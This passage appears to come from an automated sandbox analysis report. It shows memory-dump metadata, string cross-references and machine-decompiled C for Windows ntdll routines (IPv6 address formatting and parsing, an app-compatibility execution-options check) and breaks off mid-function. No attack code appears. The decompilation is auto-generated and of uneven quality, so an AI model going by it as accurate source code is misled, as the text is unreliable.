                                                                                                                                                        0x023b1bf8
                                                                                                                                                        0x023b1c0e
                                                                                                                                                        0x023b1c13
                                                                                                                                                        0x023b1c16
                                                                                                                                                        0x023b1c16
                                                                                                                                                        0x023b1bf8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02368b04
                                                                                                                                                        0x02368a0e
                                                                                                                                                        0x02368a11
                                                                                                                                                        0x02368a14
                                                                                                                                                        0x02368a15
                                                                                                                                                        0x02368a18
                                                                                                                                                        0x02368a22
                                                                                                                                                        0x02368b59
                                                                                                                                                        0x02368a28
                                                                                                                                                        0x02368a3c
                                                                                                                                                        0x02368a3c
                                                                                                                                                        0x02368a42
                                                                                                                                                        0x023b1bb0
                                                                                                                                                        0x023b1b11
                                                                                                                                                        0x023b1b11
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02368a48
                                                                                                                                                        0x02368a51
                                                                                                                                                        0x02368a5b
                                                                                                                                                        0x02368a5e
                                                                                                                                                        0x02368a61
                                                                                                                                                        0x02368a69
                                                                                                                                                        0x02368a69
                                                                                                                                                        0x02368a6d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02368a74
                                                                                                                                                        0x02368a7c
                                                                                                                                                        0x02368a7d
                                                                                                                                                        0x02368a91
                                                                                                                                                        0x02368a93
                                                                                                                                                        0x02368a93
                                                                                                                                                        0x02368a98
                                                                                                                                                        0x02368a9b
                                                                                                                                                        0x02368aa1
                                                                                                                                                        0x02368aa1
                                                                                                                                                        0x02368aa4
                                                                                                                                                        0x02368aaa
                                                                                                                                                        0x02368ab1
                                                                                                                                                        0x02368ac5
                                                                                                                                                        0x02368ac7
                                                                                                                                                        0x02368ac7
                                                                                                                                                        0x02368ac5
                                                                                                                                                        0x02368ace
                                                                                                                                                        0x023b1bc9
                                                                                                                                                        0x023b1bce
                                                                                                                                                        0x023b1bd2
                                                                                                                                                        0x023b1bd2
                                                                                                                                                        0x02368ad8
                                                                                                                                                        0x02368aeb
                                                                                                                                                        0x02368aeb
                                                                                                                                                        0x02368af0
                                                                                                                                                        0x02368af4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02368af4
                                                                                                                                                        0x02368a42
                                                                                                                                                        0x02368926
                                                                                                                                                        0x02368929
                                                                                                                                                        0x0236892c
                                                                                                                                                        0x0236892d
                                                                                                                                                        0x02368930
                                                                                                                                                        0x02368935
                                                                                                                                                        0x0236893a
                                                                                                                                                        0x02368b51
                                                                                                                                                        0x02368940
                                                                                                                                                        0x02368954
                                                                                                                                                        0x02368954
                                                                                                                                                        0x0236895a
                                                                                                                                                        0x023b1b63
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02368960
                                                                                                                                                        0x02368969
                                                                                                                                                        0x02368973
                                                                                                                                                        0x02368976
                                                                                                                                                        0x02368979
                                                                                                                                                        0x0236897e
                                                                                                                                                        0x02368981
                                                                                                                                                        0x02368981
                                                                                                                                                        0x02368986
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023b1b6e
                                                                                                                                                        0x023b1b74
                                                                                                                                                        0x023b1b7b
                                                                                                                                                        0x023b1b8f
                                                                                                                                                        0x023b1b91
                                                                                                                                                        0x023b1b91
                                                                                                                                                        0x023b1b99
                                                                                                                                                        0x023b1b9c
                                                                                                                                                        0x023b1ba2
                                                                                                                                                        0x023b1ba2
                                                                                                                                                        0x0236898c
                                                                                                                                                        0x02368992
                                                                                                                                                        0x02368999
                                                                                                                                                        0x023689ad
                                                                                                                                                        0x023b1ba8
                                                                                                                                                        0x023b1ba8
                                                                                                                                                        0x023689ad
                                                                                                                                                        0x023689b6
                                                                                                                                                        0x023689c8
                                                                                                                                                        0x023689cd
                                                                                                                                                        0x023689d0
                                                                                                                                                        0x023689d0
                                                                                                                                                        0x023689d6
                                                                                                                                                        0x023689e8
                                                                                                                                                        0x023689e8
                                                                                                                                                        0x023689ed
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023689ed
                                                                                                                                                        0x0236895a
                                                                                                                                                        0x0236883e
                                                                                                                                                        0x02368841
                                                                                                                                                        0x02368844
                                                                                                                                                        0x02368845
                                                                                                                                                        0x02368848
                                                                                                                                                        0x0236884d
                                                                                                                                                        0x02368852
                                                                                                                                                        0x02368b49
                                                                                                                                                        0x02368858
                                                                                                                                                        0x0236886c
                                                                                                                                                        0x0236886c
                                                                                                                                                        0x02368872
                                                                                                                                                        0x023b1b0e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02368878
                                                                                                                                                        0x02368881
                                                                                                                                                        0x0236888b
                                                                                                                                                        0x0236888e

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • WindowsExcludedProcs, xrefs: 023687C1
                                                                                                                                                        • Kernel-MUI-Language-SKU, xrefs: 023689FC
                                                                                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 02368827
                                                                                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 02368914
                                                                                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 023687E6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcspbrk
                                                                                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                        • API String ID: 402402107-258546922
                                                                                                                                                        • Opcode ID: 7213492224bfe90d8ae8fdf8d4ac94f2ff9720060fe53b668dedf6ff8d0ab58c
                                                                                                                                                        • Instruction ID: d945cfa33a9f2a09666ab84c1a927d03c7758e7137f740071b729b24b8647a52
                                                                                                                                                        • Opcode Fuzzy Hash: 7213492224bfe90d8ae8fdf8d4ac94f2ff9720060fe53b668dedf6ff8d0ab58c
                                                                                                                                                        • Instruction Fuzzy Hash: 26F1B6B2D00209EFDB21DF95C9849EEB7F9FF08304F1484AAE905A7611D735AA45DF50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 38%
                                                                                                                                                        			E023813CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                        				char _v8;
                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                        				intOrPtr* _v16;
                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                        				char _v24;
                                                                                                                                                        				intOrPtr _t71;
                                                                                                                                                        				signed int _t78;
                                                                                                                                                        				signed int _t86;
                                                                                                                                                        				char _t90;
                                                                                                                                                        				signed int _t91;
                                                                                                                                                        				signed int _t96;
                                                                                                                                                        				intOrPtr _t108;
                                                                                                                                                        				signed int _t114;
                                                                                                                                                        				void* _t115;
                                                                                                                                                        				intOrPtr _t128;
                                                                                                                                                        				intOrPtr* _t129;
                                                                                                                                                        				void* _t130;
                                                                                                                                                        
                                                                                                                                                        				_t129 = _a4;
                                                                                                                                                        				_t128 = _a8;
                                                                                                                                                        				_t116 = 0;
                                                                                                                                                        				_t71 = _t128 + 0x5c;
                                                                                                                                                        				_v8 = 8;
                                                                                                                                                        				_v20 = _t71;
                                                                                                                                                        				if( *_t129 == 0) {
                                                                                                                                                        					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                        						goto L5;
                                                                                                                                                        					} else {
                                                                                                                                                        						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                        						if(_t96 != 0) {
                                                                                                                                                        							L38:
                                                                                                                                                        							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                        								goto L5;
                                                                                                                                                        							} else {
                                                                                                                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                        								_t86 = E02377707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                        								L36:
                                                                                                                                                        								return _t128 + _t86 * 2;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                        						if(_t114 == 0) {
                                                                                                                                                        							L33:
                                                                                                                                                        							_t115 = 0x2342926;
                                                                                                                                                        							L35:
                                                                                                                                                        							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                        							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                        							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                        							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                        							_t86 = E02377707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                        							goto L36;
                                                                                                                                                        						}
                                                                                                                                                        						if(_t114 != 0xffff) {
                                                                                                                                                        							_t116 = 0;
                                                                                                                                                        							goto L38;
                                                                                                                                                        						}
                                                                                                                                                        						if(_t114 != 0) {
                                                                                                                                                        							_t115 = 0x2349cac;
                                                                                                                                                        							goto L35;
                                                                                                                                                        						}
                                                                                                                                                        						goto L33;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					L5:
                                                                                                                                                        					_a8 = _t116;
                                                                                                                                                        					_a4 = _t116;
                                                                                                                                                        					_v12 = _t116;
                                                                                                                                                        					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                        						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                        							_v8 = 6;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					_t90 = _v8;
                                                                                                                                                        					if(_t90 <= _t116) {
                                                                                                                                                        						L11:
                                                                                                                                                        						if(_a8 - _a4 <= 1) {
                                                                                                                                                        							_a8 = _t116;
                                                                                                                                                        							_a4 = _t116;
                                                                                                                                                        						}
                                                                                                                                                        						_t91 = 0;
                                                                                                                                                        						if(_v8 <= _t116) {
                                                                                                                                                        							L22:
                                                                                                                                                        							if(_v8 < 8) {
                                                                                                                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                        								_t128 = _t128 + E02377707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                        							}
                                                                                                                                                        							return _t128;
                                                                                                                                                        						} else {
                                                                                                                                                        							L14:
                                                                                                                                                        							L14:
                                                                                                                                                        							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                        								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                        									_push(":");
                                                                                                                                                        									_push(_t71 - _t128 >> 1);
                                                                                                                                                        									_push(_t128);
                                                                                                                                                        									_t128 = _t128 + E02377707() * 2;
                                                                                                                                                        									_t71 = _v20;
                                                                                                                                                        									_t130 = _t130 + 0xc;
                                                                                                                                                        								}
                                                                                                                                                        								_t78 = E02377707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                        								_t130 = _t130 + 0x10;
                                                                                                                                                        							} else {
                                                                                                                                                        								_push(L"::");
                                                                                                                                                        								_push(_t71 - _t128 >> 1);
                                                                                                                                                        								_push(_t128);
                                                                                                                                                        								_t78 = E02377707();
                                                                                                                                                        								_t130 = _t130 + 0xc;
                                                                                                                                                        								_t91 = _a8 - 1;
                                                                                                                                                        							}
                                                                                                                                                        							_t91 = _t91 + 1;
                                                                                                                                                        							_t128 = _t128 + _t78 * 2;
                                                                                                                                                        							_t71 = _v20;
                                                                                                                                                        							if(_t91 >= _v8) {
                                                                                                                                                        								goto L22;
                                                                                                                                                        							}
                                                                                                                                                        							_t116 = 0;
                                                                                                                                                        							goto L14;
                                                                                                                                                        						}
                                                                                                                                                        					} else {
                                                                                                                                                        						_t108 = 1;
                                                                                                                                                        						_v16 = _t129;
                                                                                                                                                        						_v24 = _t90;
                                                                                                                                                        						do {
                                                                                                                                                        							if( *_v16 == _t116) {
                                                                                                                                                        								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                        									_a4 = _v12;
                                                                                                                                                        									_a8 = _t108;
                                                                                                                                                        								}
                                                                                                                                                        								_t116 = 0;
                                                                                                                                                        							} else {
                                                                                                                                                        								_v12 = _t108;
                                                                                                                                                        							}
                                                                                                                                                        							_v16 = _v16 + 2;
                                                                                                                                                        							_t108 = _t108 + 1;
                                                                                                                                                        							_t26 =  &_v24;
                                                                                                                                                        							 *_t26 = _v24 - 1;
                                                                                                                                                        						} while ( *_t26 != 0);
                                                                                                                                                        						goto L11;
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        			}





















                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                                        • Opcode ID: 48f1501068e18bf004c6b712f7b087622e2760ede910c287143f03def8002359
                                                                                                                                                        • Instruction ID: d2b117bf158b2dc66fef197154c7eef302ba102b03ed4861ba88e7525d171f47
                                                                                                                                                        • Opcode Fuzzy Hash: 48f1501068e18bf004c6b712f7b087622e2760ede910c287143f03def8002359
                                                                                                                                                        • Instruction Fuzzy Hash: E66123B1E00755AADF34EF99C8909BFBBB6EF84300B14C16EE4DA4B640D774A641CB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                        			E02377EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				char _v540;
                                                                                                                                                        				unsigned int _v544;
                                                                                                                                                        				signed int _v548;
                                                                                                                                                        				intOrPtr _v552;
                                                                                                                                                        				char _v556;
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				signed int _t33;
                                                                                                                                                        				void* _t38;
                                                                                                                                                        				unsigned int _t46;
                                                                                                                                                        				unsigned int _t47;
                                                                                                                                                        				unsigned int _t52;
                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                        				unsigned int _t62;
                                                                                                                                                        				void* _t69;
                                                                                                                                                        				void* _t70;
                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                        				signed int _t73;
                                                                                                                                                        				void* _t74;
                                                                                                                                                        				void* _t75;
                                                                                                                                                        				void* _t76;
                                                                                                                                                        				void* _t77;
                                                                                                                                                        
                                                                                                                                                        				_t33 =  *0x2422088; // 0x7777b0d6
                                                                                                                                                        				_v8 = _t33 ^ _t73;
                                                                                                                                                        				_v548 = _v548 & 0x00000000;
                                                                                                                                                        				_t72 = _a4;
                                                                                                                                                        				if(E02377F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                        					__eflags = _v548;
                                                                                                                                                        					if(_v548 == 0) {
                                                                                                                                                        						goto L1;
                                                                                                                                                        					}
                                                                                                                                                        					_t62 = _t72 + 0x24;
                                                                                                                                                        					E02393F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                        					_t71 = 0x214;
                                                                                                                                                        					_v544 = 0x214;
                                                                                                                                                        					E0234DFC0( &_v540, 0, 0x214);
                                                                                                                                                        					_t75 = _t74 + 0x20;
                                                                                                                                                        					_t46 =  *0x2424218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                        					__eflags = _t46;
                                                                                                                                                        					if(_t46 == 0) {
                                                                                                                                                        						goto L1;
                                                                                                                                                        					}
                                                                                                                                                        					_t47 = _v544;
                                                                                                                                                        					__eflags = _t47;
                                                                                                                                                        					if(_t47 == 0) {
                                                                                                                                                        						goto L1;
                                                                                                                                                        					}
                                                                                                                                                        					__eflags = _t47 - 0x214;
                                                                                                                                                        					if(_t47 >= 0x214) {
                                                                                                                                                        						goto L1;
                                                                                                                                                        					}
                                                                                                                                                        					_push(_t62);
                                                                                                                                                        					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                        					E02393F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                        					_t52 = E02350D27( &_v540, L"Execute=1");
                                                                                                                                                        					_t76 = _t75 + 0x1c;
                                                                                                                                                        					_push(_t62);
                                                                                                                                                        					__eflags = _t52;
                                                                                                                                                        					if(_t52 == 0) {
                                                                                                                                                        						E02393F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                        						_t71 =  &_v540;
                                                                                                                                                        						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                        						_t77 = _t76 + 0x14;
                                                                                                                                                        						_v552 = _t56;
                                                                                                                                                        						__eflags = _t71 - _t56;
                                                                                                                                                        						if(_t71 >= _t56) {
                                                                                                                                                        							goto L1;
                                                                                                                                                        						} else {
                                                                                                                                                        							goto L10;
                                                                                                                                                        						}
                                                                                                                                                        						while(1) {
                                                                                                                                                        							L10:
                                                                                                                                                        							_t62 = E02358375(_t71, 0x20);
                                                                                                                                                        							_pop(_t69);
                                                                                                                                                        							__eflags = _t62;
                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                        								__eflags = 0;
                                                                                                                                                        								 *_t62 = 0;
                                                                                                                                                        							}
                                                                                                                                                        							E02393F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                        							_t77 = _t77 + 0x10;
                                                                                                                                                        							E023BE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                        							__eflags = _t62;
                                                                                                                                                        							if(_t62 == 0) {
                                                                                                                                                        								goto L1;
                                                                                                                                                        							}
                                                                                                                                                        							_t31 = _t62 + 2; // 0x2
                                                                                                                                                        							_t71 = _t31;
                                                                                                                                                        							__eflags = _t71 - _v552;
                                                                                                                                                        							if(_t71 >= _v552) {
                                                                                                                                                        								goto L1;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                        					_push(3);
                                                                                                                                                        					_push(0x55);
                                                                                                                                                        					E02393F92();
                                                                                                                                                        					_t38 = 1;
                                                                                                                                                        					L2:
                                                                                                                                                        					return E0234E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                        				}
                                                                                                                                                        				L1:
                                                                                                                                                        				_t38 = 0;
                                                                                                                                                        				goto L2;
                                                                                                                                                        			}




























                                                                                                                                                        APIs
                                                                                                                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02393F12
                                                                                                                                                        Strings
                                                                                                                                                        • ExecuteOptions, xrefs: 02393F04
                                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 0239E345
                                                                                                                                                        • Execute=1, xrefs: 02393F5E
                                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02393F4A
                                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0239E2FB
                                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02393F75
                                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02393EC4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BaseDataModuleQuery
                                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E02380B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				signed int _v12;
                                                                                                                                                        				signed int _v16;
                                                                                                                                                        				signed int _v20;
                                                                                                                                                        				signed int _v24;
                                                                                                                                                        				signed int _v28;
                                                                                                                                                        				signed int _v32;
                                                                                                                                                        				void* _t108;
                                                                                                                                                        				void* _t116;
                                                                                                                                                        				char _t120;
                                                                                                                                                        				short _t121;
                                                                                                                                                        				void* _t128;
                                                                                                                                                        				intOrPtr* _t130;
                                                                                                                                                        				char _t132;
                                                                                                                                                        				short _t133;
                                                                                                                                                        				intOrPtr _t141;
                                                                                                                                                        				signed int _t156;
                                                                                                                                                        				signed int _t174;
                                                                                                                                                        				intOrPtr _t177;
                                                                                                                                                        				intOrPtr* _t179;
                                                                                                                                                        				intOrPtr _t180;
                                                                                                                                                        				void* _t183;
                                                                                                                                                        
                                                                                                                                                        				_t179 = _a4;
                                                                                                                                                        				_t141 =  *_t179;
                                                                                                                                                        				_v16 = 0;
                                                                                                                                                        				_v28 = 0;
                                                                                                                                                        				_v8 = 0;
                                                                                                                                                        				_v24 = 0;
                                                                                                                                                        				_v12 = 0;
                                                                                                                                                        				_v32 = 0;
                                                                                                                                                        				_v20 = 0;
                                                                                                                                                        				if(_t141 == 0) {
                                                                                                                                                        					L41:
                                                                                                                                                        					 *_a8 = _t179;
                                                                                                                                                        					_t180 = _v24;
                                                                                                                                                        					if(_t180 != 0) {
                                                                                                                                                        						if(_t180 != 3) {
                                                                                                                                                        							goto L6;
                                                                                                                                                        						}
                                                                                                                                                        						_v8 = _v8 + 1;
                                                                                                                                                        					}
                                                                                                                                                        					_t174 = _v32;
                                                                                                                                                        					if(_t174 == 0) {
                                                                                                                                                        						if(_v8 == 7) {
                                                                                                                                                        							goto L43;
                                                                                                                                                        						}
                                                                                                                                                        						goto L6;
                                                                                                                                                        					}
                                                                                                                                                        					L43:
                                                                                                                                                        					if(_v16 != 1) {
                                                                                                                                                        						if(_v16 != 2) {
                                                                                                                                                        							goto L6;
                                                                                                                                                        						}
                                                                                                                                                        						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                        						L47:
                                                                                                                                                        						if(_t174 != 0) {
                                                                                                                                                        							E02358980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                        							_t116 = 8;
                                                                                                                                                        							E0234DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                        						}
                                                                                                                                                        						return 0;
                                                                                                                                                        					}
                                                                                                                                                        					if(_t180 != 0) {
                                                                                                                                                        						if(_v12 > 3) {
                                                                                                                                                        							goto L6;
                                                                                                                                                        						}
                                                                                                                                                        						_t120 = E02380CFA(_v28, 0, 0xa);
                                                                                                                                                        						_t183 = _t183 + 0xc;
                                                                                                                                                        						if(_t120 > 0xff) {
                                                                                                                                                        							goto L6;
                                                                                                                                                        						}
                                                                                                                                                        						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                        						goto L47;
                                                                                                                                                        					}
                                                                                                                                                        					if(_v12 > 4) {
                                                                                                                                                        						goto L6;
                                                                                                                                                        					}
                                                                                                                                                        					_t121 = E02380CFA(_v28, _t180, 0x10);
                                                                                                                                                        					_t183 = _t183 + 0xc;
                                                                                                                                                        					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                        					goto L47;
                                                                                                                                                        				} else {
                                                                                                                                                        					while(1) {
                                                                                                                                                        						_t123 = _v16;
                                                                                                                                                        						if(_t123 == 0) {
                                                                                                                                                        							goto L7;
                                                                                                                                                        						}
                                                                                                                                                        						_t108 = _t123 - 1;
                                                                                                                                                        						if(_t108 != 0) {
                                                                                                                                                        							goto L1;
                                                                                                                                                        						}
                                                                                                                                                        						_t178 = _t141;
                                                                                                                                                        						if(E023806BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                        							if(E023806BA(_t135, _t178) == 0 || E02380A5B(_t136, _t178) == 0) {
                                                                                                                                                        								if(_t141 != 0x3a) {
                                                                                                                                                        									if(_t141 == 0x2e) {
                                                                                                                                                        										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                        											goto L41;
                                                                                                                                                        										} else {
                                                                                                                                                        											_v24 = _v24 + 1;
                                                                                                                                                        											L27:
                                                                                                                                                        											_v16 = _v16 & 0x00000000;
                                                                                                                                                        											L28:
                                                                                                                                                        											if(_v28 == 0) {
                                                                                                                                                        												goto L20;
                                                                                                                                                        											}
                                                                                                                                                        											_t177 = _v24;
                                                                                                                                                        											if(_t177 != 0) {
                                                                                                                                                        												if(_v12 > 3) {
                                                                                                                                                        													L6:
                                                                                                                                                        													return 0xc000000d;
                                                                                                                                                        												}
                                                                                                                                                        												_t132 = E02380CFA(_v28, 0, 0xa);
                                                                                                                                                        												_t183 = _t183 + 0xc;
                                                                                                                                                        												if(_t132 > 0xff) {
                                                                                                                                                        													goto L6;
                                                                                                                                                        												}
                                                                                                                                                        												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                        												goto L20;
                                                                                                                                                        											}
                                                                                                                                                        											if(_v12 > 4) {
                                                                                                                                                        												goto L6;
                                                                                                                                                        											}
                                                                                                                                                        											_t133 = E02380CFA(_v28, 0, 0x10);
                                                                                                                                                        											_t183 = _t183 + 0xc;
                                                                                                                                                        											_v20 = _v20 + 1;
                                                                                                                                                        											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                        											goto L20;
                                                                                                                                                        										}
                                                                                                                                                        									}
                                                                                                                                                        									goto L41;
                                                                                                                                                        								}
                                                                                                                                                        								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                        									goto L41;
                                                                                                                                                        								} else {
                                                                                                                                                        									_t130 = _t179 + 1;
                                                                                                                                                        									if( *_t130 == _t141) {
                                                                                                                                                        										if(_v32 != 0) {
                                                                                                                                                        											goto L41;
                                                                                                                                                        										}
                                                                                                                                                        										_v32 = _v8 + 1;
                                                                                                                                                        										_t156 = 2;
                                                                                                                                                        										_v8 = _v8 + _t156;
                                                                                                                                                        										L34:
                                                                                                                                                        										_t179 = _t130;
                                                                                                                                                        										_v16 = _t156;
                                                                                                                                                        										goto L28;
                                                                                                                                                        									}
                                                                                                                                                        									_v8 = _v8 + 1;
                                                                                                                                                        									goto L27;
                                                                                                                                                        								}
